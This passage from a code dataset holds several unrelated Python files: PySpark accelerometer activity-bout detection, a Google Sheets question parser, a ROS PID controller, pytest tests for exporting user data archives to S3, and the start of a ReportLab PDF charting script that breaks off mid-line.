DataFrame object with timestamp data\n :return:\n number of seconds\n \"\"\"\n\n ## notice: the resulting offset must be smaller than the tumbling window\n st_date = df.first()[0]\n st_min = st_date.minute\n st_sec = st_date.second\n start_time = (st_min - 10 * (st_min // 10)) * 60 + st_sec\n offset = '{} seconds'.format(str(start_time))\n\n return offset\n\n\n##########################################################################################################\n\ndef consecutive_time(df, ts_name, interval):\n \"\"\"\n Add two columns with the start date and end date of consecutive timestamps which differ by a given interval.\n\n :param df:\n Spark DataFrame object with timestamp data\n :param ts_name:\n column with timestamp data\n :param interval:\n required precision (in seconds)\n :return:\n Spark DataFrame object with timestamp data\n \"\"\"\n\n df_ = df.withColumn(\"rn\", F.row_number().over(Window.orderBy('{}'.format(ts_name))))\n\n df_ = df_.cache()\n df_ = df_.checkpoint()\n df_.count()\n\n df_.createOrReplaceTempView('df_')\n\n spark = SparkSession.builder.getOrCreate()\n\n df_ = spark.sql(\"\"\" WITH tmp AS(\n SELECT *, BIGINT({}) - rn * {} AS totsec\n FROM df_)\n SELECT *, MIN({}) OVER(PARTITION BY totsec) AS start, \n MAX({}) OVER(PARTITION BY totsec) AS end,\n ROW_NUMBER() OVER(PARTITION BY totsec ORDER BY {}) AS id\n FROM tmp\n \"\"\".format(ts_name, str(interval), ts_name, ts_name, ts_name)).drop('totsec').drop('rn')\n\n df_.createOrReplaceTempView('df_')\n\n df_ = spark.sql(\"\"\" SELECT *, BIGINT(start) - LAG(BIGINT(end),1,BIGINT(end)) OVER(ORDER BY timestamp) AS pause\n FROM df_\n \"\"\")\n\n return df_\n\n\n##########################################################################################################\n\ndef detect_bouts(df, ts_name, col_name, new_col, interval, UP, LOW, DURATION, TOL):\n \"\"\"\n Create a new column based on filters on timestamps.\n\n :param df:\n Spark DataFrame object with timestamp data\n :param ts_name:\n column with timestamp data\n :param col_name:\n column on which the filter must be applied\n :param new_col:\n column with applied filters\n :param interval:\n epoch duration (in seconds)\n :param UP:\n upper limit of activity count per minute\n :param LOW:\n lower limit of activity count per minute\n :param DURATION:\n minimum bout duration (in minutes)\n :param TOL:\n tolerance (in minutes)\n 
:return:\n Spark DataFrame object with timestamp data\n \"\"\"\n\n ## assume one epoch smaller than 1 minute\n assert interval <= 60, \"Epoch larger than 1 minute.\"\n\n ## number of epochs per minute\n n = 60 / interval\n\n ## bounds on measured quantitity per epoch\n up, low = (UP / n, LOW / n)\n\n ## convert tolerance in seconds\n tol = TOL * 60\n\n ## number of epoch in tolerance interval\n epochs_tol = tol / interval\n\n ## convert minimum bout duration in seconds\n duration = DURATION * 60\n\n ## Number of epochs in minimum bout duration\n epochs_min_bout = duration / interval\n\n ## filter dataframe with: low <= col_name <= up\n inbout = (F.col('{}'.format(col_name)) >= low) & (F.col('{}'.format(col_name)) <= up)\n df1 = df.filter(inbout).orderBy('{}'.format(ts_name))\n df1.checkpoint()\n\n ## determine consecutive timestamps in df1\n df1 = consecutive_time(df1, '{}'.format(ts_name), interval)\n df1 = df1.selectExpr(['{}'.format(ts_name), 'start as activity_start'])\n\n pause_list = 0\n\n if TOL > 0:\n ## filter data with col_name < low and col_name > up\n df2 = df.filter(~inbout).orderBy('{}'.format(ts_name))\n df2 = df2.cache()\n df2 = df2.checkpoint()\n df2.count()\n\n ## determine consecutive timestamps in df2\n df2 = consecutive_time(df2, '{}'.format(ts_name), interval)\n df2 = df2.selectExpr(['{}'.format(ts_name), 'start as pause_start'])\n\n ## filter periods larger than tolerance\n df2 = df2.groupBy('pause_start').count()\n df2 = df2.filter(df2['count'] > epochs_tol).orderBy('pause_start')\n df2 = df2.withColumn('pause_end', (F.col('pause_start').cast(IntegerType()) +\n (F.col('count') - 1) * interval).cast(TimestampType())\n ).drop('count')\n\n pause_list = df2.collect()\n\n ## merge df1 to the accelerometer dataframe\n df3 = df.join(df1, ['{}'.format(ts_name)], 'leftouter')\n df3.checkpoint()\n\n if TOL > 0:\n\n ## assign pause periods\n df3 = df3.withColumn('pause', F.lit(0))\n\n for row in pause_list:\n df3 = df3.withColumn('pause', F.when((F.col('{}'.format(ts_name)) >= row['pause_start']) &\n (F.col('{}'.format(ts_name)) <= row['pause_end']),\n 1).otherwise(F.col('pause'))\n )\n\n ## assign previous non-zero 'start' to missing values given 'pause' < tolerance\n df3 = df3.withColumn('activity_start', F.when((F.col('activity_start').isNull()) &\n (F.col('pause') == 0),\n F.last(F.col('activity_start'), ignorenulls=True)\n .over(Window.orderBy(ts_name))\n ).otherwise(F.col('activity_start'))\n ).drop('pause')\n\n ## define a flag to select rows with non-zero 'activity_start'\n df3 = df3.withColumn('check', F.when(F.col('activity_start').isNotNull(), F.lit(1)).otherwise(F.lit(0)))\n\n ## select rows with non-zero 'activity_start'\n df2 = df3.select(['{}'.format(ts_name), 'check']).filter(F.col('check') == 1)\n\n ## assign bout start\n df2 = consecutive_time(df2, '{}'.format(ts_name), interval).selectExpr(\n ['{}'.format(ts_name), 'start as bout_start'])\n\n ## assign bout to dataframe\n df3 = df3.join(df2, ['{}'.format(ts_name)], 'leftouter').drop(*['activity_start', 'check'])\n\n df3 = df3.withColumn('bout_start', F.when(F.col('bout_start').isNull(),\n F.col(ts_name)\n ).otherwise(F.col('bout_start'))\n )\n\n ## filter periods larger than the minimum bout duration\n df1 = df3.groupBy('bout_start').count()\n df1.checkpoint()\n\n df1 = df1.filter(df1['count'] > epochs_min_bout).orderBy('bout_start')\n\n df1 = df1.withColumn('bout_end', (F.col('bout_start').cast(IntegerType()) +\n F.col('count') * interval).cast(TimestampType())\n ).drop('count')\n\n df1 = 
df1.withColumn(new_col, F.row_number().over(Window.orderBy('bout_start')))\n\n bouts_list = df1.collect()\n\n ## initialize activityBoutNumber to zero\n df3 = df3.drop(*['start', 'end', 'check', 'pause', 'bout_start'])\n\n df3 = df3.withColumn(new_col, F.lit(0))\n\n df3.checkpoint()\n\n ## assign activityBoutNumber\n for row in bouts_list:\n df3 = df3.withColumn(new_col, F.when((F.col('{}'.format(ts_name)) >= row['bout_start']) &\n (F.col('{}'.format(ts_name)) <= row['bout_end']),\n row[new_col]\n ).otherwise(F.col(new_col))\n )\n\n df3 = df3.orderBy('{}'.format(ts_name))\n\n return df3\n\n\n##########################################################################################################\n\ndef select_acc_intervals(df, ts_name, interval, window, incl_vect=False, incl_acc=False):\n \"\"\"\n Filter DataFrame with a new epoch duration.\n\n :param df:\n Spark DataFrame object with timestamp data\n :param ts_name:\n column with timestamp data\n :param interval:\n initial epoch duration (in seconds)\n :param window:\n new epoch duration (in seconds)\n :param incl_vect:\n if true, calculate vector magnitude and include it in the DataFrame\n :param incl_acc:\n if true, all raw accelerometer data are included in the DataFrame\n :return:\n Spark DataFrame object with timestamp data\n \"\"\"\n\n ## the window must be larger tha a single epoch\n assert interval <= 60, \"Epoch larger than 1 minute.\"\n assert window >= interval, \"Window smaller than epoch.\"\n\n cols = df.columns\n selected_cols = ['axis1', 'axis2', 'axis3', 'steps'] # TODO: add eeAccumulator\n\n minp = df.select(F.min(ts_name).cast('long')).first()[0]\n\n if interval < window:\n\n df2 = df.withColumn('tmp', F.row_number().over(Window.orderBy(ts_name)) - 1)\n\n df2 = df2.withColumn('total_sec', F.col(ts_name).cast('long')).cache()\n df2 = df2.checkpoint()\n df2.count()\n\n for col in selected_cols:\n\n df2 = df2.withColumn(col, F.when(((F.col('total_sec') - minp) % window == 0),\n F.sum(col).over(Window.orderBy('total_sec')\n .rangeBetween(0, window - interval)\n )\n ).otherwise(0)\n )\n\n df2 = df2.withColumn('duration', F.col(ts_name).cast(IntegerType()) -\n F.lag(F.col(ts_name).cast(IntegerType()), 1, minp)\n .over(Window.orderBy(ts_name))\n ).drop('total_sec')\n\n df2 = df2.withColumn('tmp', (F.col('tmp') * F.col('duration')) % window).drop('duration').orderBy(ts_name)\n\n df2 = df2.filter(F.col('tmp') == 0).drop('tmp').orderBy(ts_name)\n\n else:\n\n df2 = df\n\n if incl_vect:\n\n df2 = df2.withColumn('vectMag', F.sqrt(F.col('axis1') ** 2 + F.col('axis2') ** 2 + F.col('axis3') ** 2))\n\n cols.insert(1, 'vectMag')\n\n df2 = df2.select(cols).orderBy(ts_name)\n\n if not incl_acc:\n\n df2 = df2.select(ts_name, cols[1])\n\n return df2\n\n\n##########################################################################################################\n\ndef non_wear_filter(df, ts_name, AC_name, AI_name, interval, DURATION):\n \"\"\"\n Determine non-wearing period, for which activity count and activity intensity are assigned equal to -2.\n\n :param df:\n Spark DataFrame object with timestamp data\n :param ts_name:\n column with timestamp data\n :param AC_name:\n column with activity count values\n :param AI_name:\n column with activity intensity values\n :param interval:\n epoch duration (in seconds)\n :param DURATION:\n non-wearing period (in seconds)\n :return:\n Spark DataFrame object with timestamp data\n \"\"\"\n\n ## select valid epochs with non-negative activity count\n df1 = df.filter(F.col(AC_name) >= 0)\n\n df1 = 
df1.cache()\n    df1 = df1.checkpoint()\n    df1.count()\n\n    TOL = 0\n\n    UP = 0\n\n    LOW = 0\n\n    new_col = 'no_wear'\n\n    df1 = detect_bouts(df, ts_name, AC_name, new_col, interval, UP, LOW, DURATION, TOL)\n\n    df1 = df1.select([ts_name, new_col])\n\n    ## merge new column with the DataFrame and assign zero to missing values\n    df2 = df.join(df1, [ts_name], 'leftouter').orderBy(ts_name).fillna(0, subset=[new_col])\n\n    df2 = df2.cache()\n    df2 = df2.checkpoint()\n    df2.count()\n\n    ## assign activity count and activity intensity equal to -2 for invalid data\n    df2 = df2.withColumn(AC_name, F.when(F.col(new_col) > 0, -2).otherwise(F.col(AC_name)))\n\n    df2 = df2.withColumn(AI_name, F.when(F.col(new_col) > 0, -2).otherwise(F.col(AI_name))).drop(new_col)\n\n    return df2\n\n\n##########################################################################################################\n\ndef activity_bout_filter(df, ts_name, AC_name, new_col, interval, UP, LOW, DURATION, TOL):\n    \"\"\"\n    Detect activity bouts.\n\n    :param df:\n        Spark DataFrame object with timestamp data\n    :param ts_name:\n        column with timestamp data\n    :param AC_name:\n        column with activity count values\n    :param new_col:\n        column with applied filters\n    :param interval:\n        epoch duration (in seconds)\n    :param UP:\n        upper limit of activity count per minute\n    :param LOW:\n        lower limit of activity count per minute\n    :param DURATION:\n        minimum bout duration (in minutes)\n    :param TOL:\n        tolerance (in minutes)\n    :return:\n        Spark DataFrame object with timestamp data\n    \"\"\"\n\n    ## select valid epochs with non-negative activity count\n    df1 = df.filter(F.col(AC_name) >= 0)\n\n    df1 = df1.cache()\n    df1 = df1.checkpoint()\n    df1.count()\n\n    df1 = detect_bouts(df, ts_name, AC_name, new_col, interval, UP, LOW, DURATION, TOL)\n\n    df1 = df1.select([ts_name, new_col])\n\n    ## merge new column with the dataframe and assign zero to missing values\n    df2 = df.join(df1, [ts_name], 'leftouter').orderBy(ts_name).fillna(0, subset=[new_col])\n\n    return df2\n\n\n##########################################################################################################\n\ndef sedentary_bout_filter(df, ts_name, AC_name, new_col, interval, UP, LOW, DURATION, TOL):\n    \"\"\"\n    Detect sedentary bouts.\n\n    :param df:\n        Spark DataFrame object with timestamp data\n    :param ts_name:\n        column with timestamp data\n    :param AC_name:\n        column with activity count values\n    :param new_col:\n        column with applied filters\n    :param interval:\n        epoch duration (in seconds)\n    :param UP:\n        upper limit of activity count per minute\n    :param LOW:\n        lower limit of activity count per minute\n    :param DURATION:\n        minimum bout duration (in minutes)\n    :param TOL:\n        tolerance (in minutes)\n    :return:\n        Spark DataFrame object with timestamp data\n    \"\"\"\n\n    ## select valid epochs with non-negative activity count\n    df1 = df.filter(F.col(AC_name) >= 0)\n\n    df1 = df1.cache()\n    df1 = df1.checkpoint()\n    df1.count()\n\n    df1 = detect_bouts(df, ts_name, AC_name, new_col, interval, UP, LOW, DURATION, TOL)\n\n    df1 = df1.select([ts_name, new_col])\n\n    ## merge new column with the dataframe and assign zero to missing values\n    df2 = df.join(df1, [ts_name], 'leftouter').orderBy(ts_name).fillna(0, subset=[new_col])\n\n    return df2\n\n##########################################################################################################\n","repo_name":"emolinaro/PALMSpy","sub_path":"src/AccProcessing.py","file_name":"AccProcessing.py","file_ext":"py","file_size_in_byte":23607,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"36"}
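`activity_index` in the record above scales the Freedson-style cut points down to the epoch length before classifying; an equivalent standalone sketch, ignoring the -1/-2 sentinel codes (the cut-point values here are illustrative defaults, not taken from the record):

```python
def intensity(count, epoch_s=15, cutoffs=(100, 1952, 5725, 9499)):
    """Map an epoch's activity count to 0..4 (sedentary .. very hard)."""
    per_min = count * (60 / epoch_s)  # normalize the epoch to one minute
    for level, cutoff in enumerate(cutoffs):
        if per_min < cutoff:
            return level
    return 4
```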
+{"seq_id":"8097923076","text":"import pygsheets\nfrom secret import secret\nimport os\n\nclass QuestionParse:\n def __init__(self):\n self.file = pygsheets.authorize(client_secret=os.path.join(os.getcwd(), '/secret/credit.json'))\n self.file = self.file.open_by_key(secret.file_id)\n self.table = self.file.worksheet('index', 0)\n\n # if flag == True, then all values are parsed,\n # if flag == False, then the function will return only new values\n def __parse(self, flag: bool):\n array = self.table.get_all_values(returnas='matrix')\n array = list(filter(\n lambda x: (x[0] != '') and ((str(x[6]).replace(\" \", \"\") not in {'Обработан', 'обработан'}) or flag), array)\n )\n return array\n\n def __prepare_string(self, array):\n array = array[1::]\n result = \"сообщения в количестве {} штук \\n\".format(len(array))\n iteration_str = \"Время: {} \\n\" \\\n \"ФИО: {} \\n\" \\\n \"Почта: {} \\n\" \\\n \"Курс: {} \\n\" \\\n \"Группа: {} \\n\" \\\n \"Вопрос: {} \\n\" \\\n \"---------------\\n\"\n for val in array:\n result += iteration_str.format(\n val[0],\n val[1],\n val[2],\n val[3],\n val[4],\n val[5]\n )\n\n return result\n\n def get_new_messages(self):\n array = self.__parse(False)\n if len(array) < 2:\n return \"Нет новых сообщений\"\n return \"Новые \" + self.__prepare_string(array)\n\n def get_all_messages(self):\n array = self.__parse(True)\n return \"Все \" + self.__prepare_string(array)\n","repo_name":"vgtstptlk/question_bot","sub_path":"QuestionParse.py","file_name":"QuestionParse.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"12366361212","text":"#!/usr/bin/env python\n\nimport locale\nimport sys\nimport six\n\n\n# Below causes issues in some locales and noone knows why it was included so commenting out for now\n# locale.setlocale(locale.LC_NUMERIC, \"\")\n\n\nclass Table:\n def format_num(self, num):\n \"\"\"Format a number according to given places.\n Adds commas, etc. Will truncate floats into ints!\"\"\"\n\n try:\n if \".\" in num:\n inum = float(num)\n return locale.format(\"%.2f\", (0, inum), True)\n else:\n inum = int(num)\n return locale.format(\"%.*f\", (0, inum), True)\n\n except (ValueError, TypeError):\n return str(num.encode('utf-8')) if isinstance(num, six.string_types) else str(num)\n\n def get_max_width(self, table, index):\n \"\"\"Get the maximum width of the given column index\"\"\"\n return max([len(self.format_num(row[index])) for row in table])\n\n def pprint_table(self, table):\n \"\"\"Prints out a table of data, padded for alignment\n @param table: The table to print. A list of lists.\n Each row must have the same number of columns. \"\"\"\n col_paddings = []\n\n out = \"\"\n for i in range(len(table[0])):\n col_paddings.append(self.get_max_width(table, i))\n\n for row in table:\n # left col\n out += str(row[0]).ljust(col_paddings[0] + 1)\n # rest of the cols\n for i in range(1, len(row)):\n col = self.format_num(row[i]).rjust(col_paddings[i] + 2)\n out += col\n out += \"\\n\"\n\n return out\n\n\nif __name__ == \"__main__\":\n T = Table()\n T.bumppath = '/home/jmht/ample-dev1/examples/toxd-example/ROSETTA_MR_3/MRBUMP/cluster_run1'\n T.cluster = True\n table = T.maketable()\n out = sys.stdout\n T.pprint_table(out, table)\n","repo_name":"rigdenlab/ample","sub_path":"ample/util/printTable.py","file_name":"printTable.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"36"}
+{"seq_id":"74328269543","text":"#!/usr/bin/env python\n\"\"\"\nThe `pid.py` module is a Python implementation of a\nProportional-Integral-Derivative controller for ROS. By default, it listens on\na topic \"desired\" for the current set point and a topic \"state\" for the current\nstate of the plant being controller. It then writes to a topic \"cmd\" with the\noutput of the PID controller. If the parameter `variable` is defined, these\ntopics will be renamed as follows. This makes it easy to integrate this PID\ncontroller with ROS topics from firmware modules without remapping each of the\ntopics individually.\n\n desired -> /desired\n state -> /measured\n cmd -> /commanded\n\nIt also reads configuration from a number of other ROS parameters as well. The\ncontroller gains are passed in as parameters `Kp`, `Ki`, and `Kd`. It also\naccepts an `upper_limit` and `lower_limit` to bound the control effort output.\n`windup_limit` defines a limit for the integrator of the control loop.\n`deadband_width` can be used to apply a deadband to the control effors.\nSpecifically, commands with absolute value less than `deadband_width` will be\nchanged to 0.\n\"\"\"\nimport rospy\nfrom std_msgs.msg import Float64, String\n\nclass PID:\n \"\"\" Discrete PID control \"\"\"\n def __init__(self, Kp=0, Ki=0, Kd=0, upper_limit=1, lower_limit=-1,\n windup_limit=1000, deadband_width=0):\n self.Kp = Kp\n self.Ki = Ki\n self.Kd = Kd\n self.upper_limit = upper_limit\n self.lower_limit = lower_limit\n self.windup_limit = windup_limit\n self.deadband_width = deadband_width\n\n self.set_point = None\n self.last_error = 0\n self.integrator = 0\n\n def update(self, state):\n # If setpoint was made null, or was already null, do nothing.\n if self.set_point is None:\n return\n\n error = self.set_point - state\n\n if abs(error) < self.deadband_width:\n return 0\n\n p_value = self.Kp * error\n d_value = self.Kd * (error - self.last_error)\n self.last_error = error\n self.integrator = self.integrator + error\n self.integrator = max(-self.windup_limit, min(self.windup_limit, self.integrator))\n i_value = self.Ki * self.integrator\n\n res = p_value + i_value + d_value\n res = min(self.upper_limit, max(self.lower_limit, res))\n\n return res\n\nif __name__ == '__main__':\n rospy.init_node('pid')\n\n # Make sure that we're under an environment namespace.\n namespace = rospy.get_namespace()\n if namespace == '/':\n raise RuntimeError(\n \"Cannot be run in the global namespace. 
Please \"\n \"designate an environment for this module.\"\n )\n\n param_names = [\n \"Kp\", \"Ki\", \"Kd\", \"lower_limit\", \"upper_limit\", \"windup_limit\",\n \"deadband_width\"\n ]\n param_values = {}\n for param_name in param_names:\n private_param_name = \"~\" + param_name\n if rospy.has_param(private_param_name):\n param_values[param_name] = rospy.get_param(private_param_name)\n\n pid = PID(**param_values)\n\n pub_name = \"cmd\"\n state_sub_name = \"state\"\n desired_sub_name = \"desired\"\n\n variable = rospy.get_param(\"~variable\", None)\n if variable is not None:\n pub_name = \"{}/commanded\".format(variable)\n state_sub_name = \"{}/measured\".format(variable)\n desired_sub_name = \"{}/desired\".format(variable)\n\n pub = rospy.Publisher(pub_name, Float64, queue_size=10)\n\n def state_callback(item):\n cmd = pid.update(item.data)\n if cmd is None:\n return\n pub.publish(cmd)\n\n def set_point_callback(item):\n pid.set_point = item.data\n\n # When we receive the recipe end message, reset this PID controller to its default values.\n # This disables the set point so the controller will just idle until it is set by a new recipe.\n def recipe_end_callback(item):\n pid = PID(**param_values)\n pid.set_point = None\n\n recipe_end_topic = \"{ns}recipe_end/desired\".format(ns=rospy.get_namespace())\n recipe_end_sub = rospy.Subscriber(recipe_end_topic, String, recipe_end_callback)\n state_sub = rospy.Subscriber(state_sub_name, Float64, state_callback)\n set_point_sub = rospy.Subscriber(\n desired_sub_name, Float64, set_point_callback\n )\n\n rospy.spin()\n","repo_name":"OpenAgricultureFoundation/openag_brain","sub_path":"nodes/pid.py","file_name":"pid.py","file_ext":"py","file_size_in_byte":4327,"program_lang":"python","lang":"en","doc_type":"code","stars":222,"dataset":"github-code","pt":"36"}
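Outside ROS, the `PID` class in the record above can be exercised directly; a minimal sketch with made-up gains and measurements:

```python
pid = PID(Kp=1.0, Ki=0.1, Kd=0.05, upper_limit=1, lower_limit=-1)
pid.set_point = 25.0                      # target value, e.g. degrees C
for measured in (20.0, 22.5, 24.0, 24.8):
    cmd = pid.update(measured)            # bounded effort, 0 in deadband,
    print(measured, cmd)                  # or None when no set point is set
```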
+{"seq_id":"15586536002","text":"import datetime\nimport io\nimport json\nimport os\nimport zipfile\nfrom unittest.mock import call\n\nimport boto3\nimport settings\nfrom moto import mock_s3\n\nimport pytest\nfrom userauth.services.export import ExportUserArchive\nfrom utils import hashid\n\npytestmark = pytest.mark.usefixtures('db_session')\n\n\nclass TestExportUserArchive:\n @pytest.fixture\n def user(self, user_factory):\n return user_factory.create()\n\n @pytest.fixture\n def export_user_archive(self, user) -> ExportUserArchive:\n return ExportUserArchive(user=user)\n\n @pytest.fixture\n def mocked_zip_file(self, mocker):\n zip_file_mock = mocker.MagicMock(spec=zipfile.ZipFile)\n mocker.patch(\"zipfile.ZipFile\", return_value=zip_file_mock)\n mocked_zip_file = zip_file_mock.__enter__.return_value = mocker.Mock()\n\n return mocked_zip_file\n\n @pytest.fixture\n def file_cleanup(self, user):\n hashed_user_id = hashid.encode(user.id)\n yield\n os.remove(f\"/tmp/{hashed_user_id}.zip\")\n\n def test_user_data_is_exported(self, user, export_user_archive):\n data = export_user_archive._export_user_data()\n assert data.get(\"user\") == json.dumps(\n {\n \"id\": user.id,\n \"profile\": {\n \"id\": user.profile.id,\n \"first_name\": user.profile.first_name,\n \"last_name\": user.profile.last_name,\n },\n \"email\": user.email,\n \"is_superuser\": user.is_superuser,\n \"is_active\": user.is_active,\n \"is_confirmed\": user.is_confirmed,\n \"created\": user.created.isoformat(),\n }\n )\n\n def test_crud_demo_items_data_is_exported(self, user, crud_demo_item_factory, export_user_archive):\n item = crud_demo_item_factory.create(created_by=user)\n data = export_user_archive._export_user_data()\n assert data.get(\"crud_demo_items\") == [json.dumps({\"id\": item.id, \"name\": item.name})]\n\n def test_document_demo_item_is_exported(self, user, document_demo_item_factory, export_user_archive):\n document = document_demo_item_factory.create(created_by=user)\n data = export_user_archive._export_user_files()\n assert document.file in data\n\n @mock_s3\n def test_zip_archive_is_created(self, user, document_demo_item_factory, mocked_zip_file, export_user_archive):\n s3 = boto3.client(\"s3\", region_name='us-east-1', endpoint_url=settings.AWS_S3_ENDPOINT_URL)\n s3.create_bucket(Bucket=settings.AWS_STORAGE_BUCKET_NAME)\n document_item = document_demo_item_factory.create()\n user_data = {\"user\": \"data\"}\n document_content = b\"content\"\n with io.BytesIO() as document_file:\n document_file.write(document_content)\n document_file.seek(0)\n s3.upload_fileobj(document_file, settings.AWS_STORAGE_BUCKET_NAME, document_item.file)\n hashed_user_id = hashid.encode(user.id)\n\n archive_file_path = export_user_archive._export_user_archive_to_zip(\n user_data=user_data, user_files=[document_item.file]\n )\n\n assert archive_file_path == f\"/tmp/{hashed_user_id}.zip\"\n assert [\n call.writestr(f'{hashed_user_id}/{hashed_user_id}.json', json.dumps(user_data).encode('utf-8')),\n call.writestr(f'{hashed_user_id}/{document_item.file}', document_content),\n ] in mocked_zip_file.mock_calls\n\n @pytest.mark.usefixtures('file_cleanup', 's3_exports_bucket')\n @pytest.mark.freeze_time\n def test_user_archive_export_url_is_generated(self, user, export_user_archive):\n timestamp = datetime.datetime.now().strftime(\"%d-%m-%y_%H-%M-%S\")\n expected_obj_key = f\"exports/{hashid.encode(user.id)}_{timestamp}.zip\"\n\n export_url = export_user_archive.run()\n\n assert settings.AWS_EXPORTS_STORAGE_BUCKET_NAME in export_url\n assert 
expected_obj_key in export_url\n","repo_name":"apptension/saas-boilerplate","sub_path":"packages/workers/userauth/tests/test_services.py","file_name":"test_services.py","file_ext":"py","file_size_in_byte":3959,"program_lang":"python","lang":"en","doc_type":"code","stars":1208,"dataset":"github-code","pt":"36"}
+{"seq_id":"32143238057","text":"# encoding = utf-8\n\nfrom SDK.SDKHeader import *\nimport random\nfrom General.GlobalSetting import stk_basic\nimport pandas as pd\nimport numpy as np\nfrom reportlab.graphics.charts.barcharts import VerticalBarChart\nfrom reportlab.graphics.charts.legends import Legend\n\nfrom reportlab.lib.pagesizes import letter\n\nfrom reportlab.platypus import *\nfrom reportlab.lib.styles import getSampleStyleSheet\n\n# 画图相关\nfrom reportlab.graphics.shapes import Drawing, PolyLine, colors, Auto\nfrom reportlab.graphics import renderPDF\nfrom reportlab.graphics.charts.lineplots import LinePlot\nfrom reportlab.graphics.widgets.markers import makeMarker\nfrom reportlab.pdfbase.pdfmetrics import stringWidth\nfrom reportlab.pdfbase.ttfonts import TTFont\nfrom reportlab.pdfbase import pdfmetrics\n\npdfmetrics.registerFont(TTFont('song', 'SURSONG.TTF'))\npdfmetrics.registerFont(TTFont('hei', 'SIMHEI.TTF'))\n\nfrom reportlab.lib import fonts\nfonts.addMapping('song', 0, 0, 'song')\nfonts.addMapping('song', 0, 1, 'song')\nfonts.addMapping('song', 1, 0, 'hei')\nfonts.addMapping('song', 1, 1, 'hei')\n\n\ndef addFront(canvas_param, theme, subtitle, pagesize=letter):\n \"\"\"\n 函数功能:为pdf文档添加功能,分“主题”、“副标题”两部分\n :param canvas:\n :param pagesize: 页面大小,默认A4\n :param theme: 主题字符串\n :param subtitle: 副标题字符串\n :return:\n \"\"\"\n PAGE_WIDTH = pagesize[0]\n PAGE_HEIGHT = pagesize[1]\n\n # 设置主标题字体并打印主标题\n canvas_param.setFont(\"song\", 30)\n canvas_param.drawString((PAGE_WIDTH-stringWidth(theme, fontName='song', fontSize=30))/2.0, PAGE_HEIGHT*0.618, theme)\n\n # 设置副标题字体并打印副标题\n canvas_param.setFont(\"song\", 10)\n canvas_param.drawString((PAGE_WIDTH-stringWidth(theme, fontName='song', fontSize=30))/2.0, PAGE_HEIGHT*0.15, subtitle)\n\n canvas_param.showPage()\n\n return canvas_param\n\n\ndef add_legend(draw_obj, chart, pos_x, pos_y):\n\n \"\"\"\n 函数功能:voltGroupDisplayByBar函数的子函数\n :param draw_obj:\n :param chart:\n :return:\n \"\"\"\n legend = Legend()\n legend.alignment = 'right'\n legend.fontName = 'song'\n legend.columnMaximum = 2\n legend.x = pos_x\n legend.y = pos_y\n legend.colorNamePairs = Auto(obj=chart)\n draw_obj.add(legend)\n\n\ndef ExtractPointFromDf_DateX(df_origin, date_col, y_col, timeAxis='day'):\n\n \"\"\"\n 函数功能:从一个dataframe中提取两列,组成point列表格式,以供ReportLab画图之用\n 同时将日期中的时间提取出来,转为秒。\n\n 本函数主要用来画当日数据!因为将datetime中的date去掉了,只保留time。\n\n :param df_origin:\n :param x_col:\n :param y_col:\n :return:\n \"\"\"\n\n # 将“data”列中的数据解析后,作为新的列增加到df中\n # df_origin = ExtractJsonToColum(df_row=df_origin, col='data')\n # if len(df_origin) == 0:\n # return []\n\n # 按时间排序,并删除空值\n df_origin = df_origin.sort_values(by=date_col, ascending=True)\n df_origin = df_origin[True - df_origin[y_col].isnull()]\n\n # if len(df_origin) == 0:\n # print('函数 ExtractPointFromDf_DateX:删除空值后,dataframe为空!入参df中不含指定列')\n # return df_origin\n\n # 提取时间,并将时间转为秒\n if timeAxis == 'day':\n df_origin['time'] = df_origin.apply(lambda x: DateStr2Sec(str(x[date_col])), axis=1)\n\n elif timeAxis == 'datetime':\n df_origin['time'] = df_origin.apply(lambda x: DatetimeStr2Sec(str(x[date_col])), axis=1)\n\n elif timeAxis == 'quarter':\n df_origin['time'] = df_origin.apply(lambda x: convertQuarter2Value(str(x[date_col])), axis=1)\n\n elif timeAxis == 'year':\n df_origin['time'] = df_origin.apply(lambda x: x[date_col], axis=1)\n\n elif timeAxis == 'month':\n df_origin['time'] = df_origin.apply(lambda x:DateStr2Sec(stdMonthDate2ISO(str(x[date_col]))),axis=1)\n\n # 单独取出相应两列,准备转成point格式\n df_part = df_origin.loc[:, ['time', y_col]]\n\n # 
将df转为array\n    point_array = list(map(lambda x: (x[0], float(x[1])), df_part.values))\n\n    return point_array\n\n\ndef addAcTemp(canvas_param, opc_df_today,pos_x, pos_y, width, height):\n\n    total_df = opc_df_today\n\n    # 取出\n    # “室外天气”、\n    # “冷却侧供水温度”、\n    # “冷却侧回水温度”、\n    # “冷冻侧供水温度”、\n    # “冷冻侧回水温度”\n    total_df_OAT = total_df[total_df.browse_name == 'OA-T']\n\n    total_df_CSSWT = total_df[total_df.browse_name == 'CS-SWT']\n    total_df_CSRWT = total_df[total_df.browse_name == 'CS-RWT']\n\n    total_df_FSSWT = total_df[total_df.browse_name == 'FS-SWT']\n    total_df_FSRWT = total_df[total_df.browse_name == 'FS-RWT']\n\n    # 生成5个变量相应的点阵\n    data_OAT = ExtractPointFromDf_DateX(df_origin=total_df_OAT, date_col='present_value_source_timestamp',\n                                        y_col='present_value_value')\n\n    data_CSSWT = ExtractPointFromDf_DateX(df_origin=total_df_CSSWT, date_col='present_value_source_timestamp',\n                                          y_col='present_value_value')\n    data_CSRWT = ExtractPointFromDf_DateX(df_origin=total_df_CSRWT, date_col='present_value_source_timestamp',\n                                          y_col='present_value_value')\n\n    data_FSSWT = ExtractPointFromDf_DateX(df_origin=total_df_FSSWT, date_col='present_value_source_timestamp',\n                                          y_col='present_value_value')\n    data_FSRWT = ExtractPointFromDf_DateX(df_origin=total_df_FSRWT, date_col='present_value_source_timestamp',\n                                          y_col='present_value_value')\n\n    data_origin = [tuple(data_OAT), tuple(data_CSSWT), tuple(data_CSRWT), tuple(data_FSSWT), tuple(data_FSRWT)]\n\n    # 定义各曲线标签\n    data_name_origin = ['室外温度', '冷却侧供水温度', '冷却侧回水温度', '冷冻侧供水温度', '冷冻侧回水温度']\n\n    # 处理某条线没有数据的情况,若不处理“没有数据”的情况,画线的时候会报错!\n    data = []\n    data_name = []\n\n    for i in range(0, len(data_origin)):\n        if len(data_origin[i]) != 0:\n            data.append(data_origin[i])\n            data_name.append(data_name_origin[i])\n\n    if len(data) == 0:\n        print('函数 addAcTemp:原始df解析后没有想要的温度数据!')\n        return canvas_param\n\n    c = canvas_param\n    # c.setFont(\"song\", 